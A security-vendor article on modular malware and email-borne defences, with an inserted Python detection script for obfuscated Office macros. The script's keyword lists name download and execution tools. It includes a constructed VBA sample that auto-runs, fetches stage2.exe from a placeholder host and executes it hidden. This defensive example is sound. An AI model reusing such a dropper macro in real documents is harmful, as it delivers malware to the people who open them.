Modular malware: A multi-level threat

Whilst not a new threat, modular malware has increasingly become a tool of choice for cybercriminals looking to diversify their attacks. This type of malware, which can launch different types of malicious payloads based on the target, presents a complex security challenge.

Barracuda’s research indicates that the use of modular malware has been on the rise since the beginning of 2019. A recent analysis of email attacks targeting Barracuda customers found more than 150,000 unique malicious files in the first five months of this year.

As such, this evolving threat requires a multi-layered data protection and security strategy that can address both technical and human vulnerabilities to ensure network and data safety.

Multi-purpose cyberattacks in a single package

Modular malware is typically delivered as an email attachment and provides a much more robust, evasive, and effective attack strategy than standard malware. These attacks include a variety of different payloads or plugins that can be installed and launched after the initial attack.

Most malware is distributed as a document attachment that is sent via spam to widely-circulated email lists. These email lists are sold, traded, aggregated, and revised as they move through the dark web.

While the initial email infiltration follows a standard pattern — users are prompted to open or download a suspicious attachment — the attack becomes more complicated over time. After the initial download, only the essential components of the malware are installed. That first module acts as a scout: it profiles the network and the security tooling in place, looks for exploitable weaknesses, and works out which follow-on attacks are most likely to succeed.

After performing this reconnaissance under the radar, the first stage of the malware contacts its command and control server (C2), which provides further instructions to more effectively exploit a given network.

Once an infected document is opened, either the malware is automatically installed or a heavily obfuscated macro/script is used to download and install it from an external source. Occasionally, a link or other clickable item is used, but that approach is much more common in phishing attacks than malware attacks.

Modular malware comes in a variety of forms. Plurox is a good example: it combines a backdoor Trojan, a cryptocurrency miner and a self-propagating worm in a single package.

Another Trojan, called CookieMiner, installs a hidden cryptocurrency miner on the infected machine and can also steal payment or personal data. Trickbot, a banking Trojan, has been updated multiple times so that it can now harvest application data, send spam, and deliver other types of malware. It also includes a module designed to steal browser cookies.

The fact that a single breach can result in a wide variety of different issues makes modular malware much more difficult to defend against. Since the first module is merely watching or exploring the network, alarms aren’t raised until other attacks have commenced. Often, that’s too late.

With the rise of botnets executing commands provided by cybercriminals and malware written for wide-spread distribution, modularity has become the new norm. Malware authors are increasingly organised and continue to adopt and implement software-industry practices, including quality assurance and testing, to improve the success of attacks. In response to the demand to meet multiple needs with one widely-distributed malware file, modular malware has evolved to become more feature-rich and flexible.

That means companies have to take a multi-pronged approach to detect and defend against modular malware. Those efforts should include:

Training: This is the most critical part of any good security program. End users have to be trained to recognise suspicious emails and to avoid opening attachments from unknown sources. Phishing simulation and training must be part of any security awareness training program. Update that training as new attacks emerge. These simulations can also help identify the most at-risk end users for additional training and education.

Gateway Security: Deploy malware detection, firewalls, sandboxing, and spam filters to provide both inbound and outbound security. Static and dynamic analysis tools can spot emails carrying attachments that try to download or run an executable. A threat intelligence or heuristics system can flag the URL that executable is fetched from. The same analysis can detect the obfuscation techniques used inside a suspicious attachment, such as macros that assemble strings or URLs at runtime to hide what they do.

While the best line of defence is for employees not to open these emails or attachments, cybercriminals have gotten better at manipulating targets. Spam filters and other gateway software compensate for that by blocking these messages before they reach employee inboxes in the first place. Advanced firewalls can also help shut down these attacks if employees do click those links or attachments.

Additionally, artificial intelligence, DMARC validation and other advanced approaches can help spot spear-phishing or different types of high-level attacks that might bypass an email gateway.
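The static analysis step described above, and the obfuscated download-and-run macros mentioned earlier, can be illustrated with a small triage routine. The following is an added example written for this article; it is not Barracuda code and not part of the original text. It assumes an Office attachment arrives as bytes and that the macro source has already been extracted (in practice with a tool such as olevba from oletools; here a constructed sample macro stands in for it). The suspicious-keyword lists, the scoring thresholds and the domain example.invalid are assumptions chosen for illustration.

```python
"""Static triage of a macro-bearing Office attachment (added example, not from the article)."""
import io
import re
import zipfile

# Heuristic indicators for VBA macro source (illustrative list, not exhaustive).
AUTO_EXEC = re.compile(r"\b(AutoOpen|Document_Open|Workbook_Open|AutoExec|Auto_Open)\b", re.I)
DOWNLOAD = re.compile(r"\b(URLDownloadToFile|XMLHTTP|WinHttpRequest|MSXML2)\b", re.I)
EXEC = re.compile(r"\b(Shell|WScript\.Shell|CreateObject|powershell|mshta|rundll32)\b", re.I)
CHR_CALL = re.compile(r"\bChr\((\d+)\)", re.I)
STR_CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
URL = re.compile(r"https?://[^\s\"']+", re.I)


def has_vba_project(data: bytes) -> bool:
    """OOXML files (.docm/.xlsm/.pptm) are zip archives; macros live in a vbaProject.bin member.
    Legacy OLE (.doc/.xls) files need an OLE parser such as olevba, which is out of scope here."""
    if not data.startswith(b"PK"):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(name.lower().endswith("vbaproject.bin") for name in zf.namelist())
    except zipfile.BadZipFile:
        return False


def deobfuscate(src: str) -> str:
    """Undo two common string tricks: Chr(NN) calls and "a" & "b" concatenation chains."""
    def chr_repl(m: re.Match) -> str:
        code = int(m.group(1))
        # Only printable ASCII is folded into a literal; anything else is left as written.
        return '"%s"' % chr(code) if 32 <= code < 127 else m.group(0)

    out = CHR_CALL.sub(chr_repl, src)
    # Merge adjacent literals until nothing changes (each pass merges pairs left to right).
    prev = None
    while prev != out:
        prev = out
        out = STR_CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), out)
    return out


def triage_macro(src: str) -> dict:
    """Score macro source after deobfuscation and return findings plus any URLs to check
    against threat intelligence. Thresholds are illustrative."""
    clean = deobfuscate(src)
    findings = []
    if AUTO_EXEC.search(clean):
        findings.append("auto-exec trigger")
    if DOWNLOAD.search(clean):
        findings.append("download capability")
    if EXEC.search(clean):
        findings.append("process execution")
    if CHR_CALL.search(src) or STR_CONCAT.search(src):
        findings.append("string obfuscation")
    urls = URL.findall(clean)
    score = len(findings) + (1 if urls else 0)
    verdict = "block" if score >= 3 else ("review" if score else "allow")
    return {"findings": findings, "urls": urls, "score": score, "verdict": verdict}


def build_sample_docm(with_macro: bool) -> bytes:
    """Constructed stand-in for an attachment: a minimal OOXML zip with or without a macro stream."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed placeholder stream")
    return buf.getvalue()


# Constructed macro in the style described in the article: assemble a downloader object name
# and a URL from fragments so that a naive keyword scan sees neither "XMLHTTP" nor the URL.
SAMPLE_MACRO = r'''Sub AutoOpen()
    Dim x As Object
    Set x = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & "." & "XM" & "LHTTP")
    x.Open "GET", "http://" & "example" & ".invalid/" & "stage2.exe", False
    x.Send
    Shell Environ("TEMP") & "\st.exe", vbHide
End Sub'''

if __name__ == "__main__":
    print("macro stream present:", has_vba_project(build_sample_docm(True)))
    print(triage_macro(SAMPLE_MACRO))
```

Running the block on the constructed sample reports an auto-exec trigger, download capability, process execution and string obfuscation, and recovers http://example.invalid/stage2.exe as the URL to hand to a threat-intelligence lookup; the raw source contains neither "XMLHTTP" nor a complete URL, which is exactly why deobfuscation has to precede keyword matching. A real gateway would replace the keyword lists with maintained signatures and run the attachment in a sandbox as well.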

Backup: Make sure you have a robust backup and data protection solution in place to help recover any data that might be lost as a result of a modular malware attack. 

Modular malware represents a more significant threat than traditional cyberattacks because of its advanced attack strategy. By combining security training with advanced threat protection and security solutions, companies can spot these attacks more quickly and shut them down before they can do significant damage.

Jonathan Tanner, Senior Security Researcher, Barracuda Networks